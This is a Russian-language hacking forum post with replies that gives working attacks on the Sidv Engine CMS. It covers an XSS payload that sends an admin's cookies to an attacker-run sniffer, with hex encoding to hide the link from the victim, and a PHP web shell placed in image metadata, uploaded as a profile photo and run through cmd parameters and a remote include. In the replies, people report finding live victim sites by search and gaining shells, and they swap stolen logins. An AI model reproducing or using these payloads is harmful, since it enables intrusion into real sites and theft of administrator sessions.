Script: Sidv Engine <= v3.031 Автор: p-range http://p-range.info/ Название: Уязвимости Sidv Engine ============================= XSS Пример как угнать куки админа ============================= нашли xss http://host/index.php?m=%3Cscript%3Ealert(document.cookie)%3C/script%3E Создаем файл cookie.js и пишем в нем: location.href='http://твой_сайт_с_php/sniffer.php' + document.cookie; Создаем файл sniffer.php Это код простейшего сниффера. Их полно в сети. Создаем файл cookies.txt и ставим права на запись. (В доведенный до ума снифер обычно включают различные проверки и нет необходимости создавать другие файлы) В итоге получаем строчку: <script src=http://твой_сайт_с_php/cookie.js></script> Получаем урл вида: http://host/index.php?m=<script src=http://http://твой_сайт_с_php/cookie.js></script> Для того чтобы админ не запалил такой урл, кодируем его в ASCII. Напишем небольшой скрипт для кодирования текста в ASCII. Или воспользуемся скриптом от CodeRunner: Кодируем и получаем: http://host/index.php?m=%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2 F%68%74%74%70%3A%2F%2F%3F%3F%3F%3F%5F%3F%3F%3F%3F%5F%3F%5F%70%68%70%2F%63%6F%6F% 6B%69%65%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E Впариваем ссылку админу и ждем плюшек. ============= PHP Injection Получаем шелл ============= [1] Открываем фотошоп, создаем картинку 60х60. Идем в File -> File Info и пишем в поле копирайтов: <?php passthru($_GET['cmd']); include($_GET['sh']); ?> У меня получилось примерно следующее: Сохраняем картинку с именем image.php [2] Регистрируемся на портале. Заходим в меню "Профиль". Из списка выбираем вкладку "Фотография". Ставим галочку на последнем пункте (Закачать фотографию), жмем обзор и выбираем наш image.php. Жмем Далее и видим сообщение "Сохранение вашей фотографии прошло успешно!". Итак, теперь пишем простенький скрипт для загрузки файлов на сервер. Написали. Теперь заливаем его на сервер БЕЗ ПОДДЕРЖКИ PHP (Например narod.ru) Запускаем скрипт так: http://host/foto_images/image.php?sh=http://hack.narod.ru/up.php Загружаем шелл через скрипт. Или выполняем команды непосредственно из строки адреса: http://host/foto_images/image.php?cmd=ls -la http://host/foto_images/image.php?cmd=id
Что-то не могу не один сайт найти с ним...или руки у меня не из того места, или спать пора ЗЫ хорошая статья, только мне кажется не всё так легко будет
вчера попробовал поискать сайты с этим движком.. вбил в гугл "powered by sidv" получил парочку шеллов. дальше не стал копать..
Бага актуальна во всех версиях. Также на оф. Сайте движка sidv.com.ru. Скорее всего ты неправильно создал картинку со скриптом, потомучто на всех сайтах с этим движком которые я проверял, все работало
все сделал как в статье, информацию о сайтах и логины, кинул тебе в асю. Не получается выполнение IMAGE.php?cmd=ls или тоже самое на удаленный сайт с пхп. Просто белая страница, или постоянный рефреш
все, вроде в асе разобрались что не так кому интересно, вот пример image.php http://p-range.info/image.txt просто измените расширение .txt на .php и действуйте
вроде разобрались в чем причина - надо юзать FireFox, или по крайней мере не ИЕ DvOrnik отпиши мне в личку что хекать будешь А то у меня уже планы на 5 паг есть
